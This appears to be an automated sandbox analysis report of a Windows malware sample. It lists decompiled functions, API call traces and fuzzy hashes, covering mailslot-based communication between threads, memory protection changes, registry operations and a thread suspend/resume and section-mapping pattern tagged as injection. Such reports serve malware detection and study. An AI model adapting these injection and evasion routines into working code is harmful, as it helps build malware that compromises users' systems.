  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
